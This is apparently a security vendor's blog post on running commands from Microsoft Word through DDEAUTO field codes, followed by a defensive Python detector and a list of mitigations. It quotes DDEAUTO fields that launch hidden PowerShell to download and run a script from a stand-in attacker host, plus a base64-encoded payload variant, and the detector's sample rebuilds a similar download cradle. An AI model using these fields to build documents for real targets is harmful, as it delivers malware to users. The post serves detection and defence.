Testing Macro-less Code Execution in Microsoft Word

A post this week on the SensePost blog details “a way to get command execution on MSWord without any Macros, or memory corruption.”

The method abuses the Dynamic Data Exchange (DDE) protocol, reached through a Word field code, to execute a command. The blog entry gives step-by-step instructions for inserting such a field into a Word document.

SensePost's example uses the following DDEAUTO field, which launches cmd.exe and PowerShell to download a script from a remote server and execute it:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http[:]//evilserver[.]ninja/pp.ps1');powershell -e $e "}

When we followed the instructions and created a Word document, it was not detected by our Machine Learning Engine.

However, all this method provides is command execution: the malicious payload itself still has to be dropped to disk or downloaded (as in the example above) and then executed.

So we altered the example, borrowing the technique from the Retefe banking trojan we looked at last week, which has PowerShell execute a base64-encoded script passed as a command-line parameter. This makes the DDE field look like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -e WwBDAEgAYQByAFsAXQBdACAAKAAzADYALAAgADEAMQA5ACAALAAgADEAMQA1A
[truncated for length]…"}

Once altered, Hector (our Machine Learning Engine) detected the Word document as malicious with 94% confidence.
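As an added example (not code from this post or from SensePost's research), the Python script below shows one way to catch both field variants described above statically, without a machine learning engine. It unzips a .docx, pulls every field instruction out of the WordprocessingML parts (including instructions that Word, or an evasive author, splits across many `<w:instrText>` runs), flags DDE/DDEAUTO fields that launch a command interpreter or contain a download cradle, and decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE text) so the inline payload can be read. The document it scans is constructed in memory; the field text, the defanged URLs and the encoded script are assumptions made for the example.

```python
"""Added example: static detection of DDE/DDEAUTO field abuse in a .docx.
Not BluVector's or SensePost's code. The scanned document is constructed
in memory; field text, URLs and the encoded script are assumptions."""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
WT = "{" + W + "}"  # Clark-notation prefix for w: elements and attributes

# -e, -ec, -en... are the prefixes PowerShell accepts for -EncodedCommand;
# -ep and -ex(ecutionPolicy) deliberately do not match.
ENC_RE = re.compile(r"(?<![\w-])-(e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|WebClient|https?(?::|\[:\])//", re.I)
LAUNCHER_RE = re.compile(
    r"(cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|certutil|msiexec)(\.exe)?$", re.I)


def extract_field_instructions(part_xml: bytes) -> list:
    """Return every field instruction in a WordprocessingML part, in document
    order. Simple fields carry it in <w:fldSimple w:instr="...">; complex fields
    spread it over <w:instrText> runs between begin/end <w:fldChar> markers,
    which defeats naive string matching on the raw XML. Nested fields are
    flattened into the outermost one (QUOTE-based obfuscation is not decoded)."""
    fields, current, depth = [], None, 0
    for el in ET.fromstring(part_xml).iter():
        if el.tag == WT + "fldSimple":
            fields.append(el.get(WT + "instr", ""))
        elif el.tag == WT + "fldChar":
            kind = el.get(WT + "fldCharType")
            if kind == "begin":
                if depth == 0:
                    current = []
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    fields.append("".join(current))
                    current = None
        elif el.tag == WT + "instrText" and current is not None:
            current.append(el.text or "")
    return fields


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text).
    Returns None when no complete, decodable argument is present; a payload
    truncated to an odd byte count, for instance, fails the UTF-16 decode."""
    for m in ENC_RE.finditer(cmdline):
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def classify_field(instr: str) -> dict:
    text = " ".join(instr.split())  # rejoin split runs, normalise whitespace
    m = re.match(r"DDE(?:AUTO)?\s+(\S+)", text, re.I)
    if not m:
        return {"instruction": text, "dde": False}
    decoded = decode_encoded_command(text)
    launcher = bool(LAUNCHER_RE.search(m.group(1)))
    downloads = bool(DOWNLOAD_RE.search(text) or (decoded and DOWNLOAD_RE.search(decoded)))
    encoded_arg = ENC_RE.search(text) is not None  # flag even when it will not decode
    return {"instruction": text, "dde": True, "executable": m.group(1),
            "downloads": downloads, "encoded_command": decoded,
            "verdict": "malicious" if (launcher or downloads or encoded_arg) else "review"}


def analyze_docx(docx_bytes: bytes) -> list:
    """Scan every XML part under word/ (body, headers, footers and footnotes
    can all hold fields) and return the DDE fields found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml") and "/_rels/" not in name:
                for instr in extract_field_instructions(z.read(name)):
                    f = classify_field(instr)
                    if f["dde"]:
                        findings.append(dict(f, part=name))
    return findings


# --- constructed sample document (assumption: modelled on the two fields above) ---
CMD = r"c:\\Windows\\System32\\cmd.exe"
FIELD_DOWNLOAD = (" DDEAUTO " + CMD + ' "/k powershell.exe -NoP -W Hidden '
                  "$e=(New-Object System.Net.WebClient).DownloadString("
                  "'http[:]//evilserver[.]ninja/pp.ps1');powershell -e $e\" ")
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http[:]//example.invalid/stage2.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
FIELD_ENCODED = " DDEAUTO " + CMD + ' "/k powershell.exe -e ' + SAMPLE_B64 + '" '


def complex_field(instr: str, chunk: int = 20) -> str:
    """A complex field whose instruction is split across several runs."""
    runs = "".join(f'<w:r><w:instrText xml:space="preserve">{escape(instr[i:i + chunk])}'
                   "</w:instrText></w:r>" for i in range(0, len(instr), chunk))
    return ('<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>x</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r>')


def build_sample_docx() -> bytes:
    body = (f"<w:p>{complex_field(FIELD_DOWNLOAD)}</w:p>"
            f"<w:p><w:fldSimple w:instr={quoteattr(FIELD_ENCODED)}><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>"
            '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>')
    doc = f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{W}"><w:body>{body}</w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


if __name__ == "__main__":
    for f in analyze_docx(build_sample_docx()):
        print(f["verdict"], f["part"], f["executable"], "encoded:", f["encoded_command"])
```

A truncated encoded argument like the one reproduced above will not decode, but the presence of `-e` followed by a long base64 string is itself enough to mark the field as malicious; the benign DATE field in the sample is left alone. This is a triage aid for documents arriving at the perimeter, not a substitute for the user prompts Word still shows before the field runs.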

Here is a summary of the mitigating factors:

  • After being advised of this research, “Microsoft responded that as suggested it is a feature and no further action will be taken, and will be considered for a next-version candidate bug.” Microsoft clearly does not consider it a critical issue.
  • A document using this technique still raises two pop-up prompts asking the user to approve proceeding, so from a social-engineering perspective the attacker is no better off than when trying to convince a user to enable a macro.
  • This method only executes a command. To run malicious code, the payload must still be dropped or downloaded, and both steps give BluVector an opportunity to detect the payload and/or the document itself.
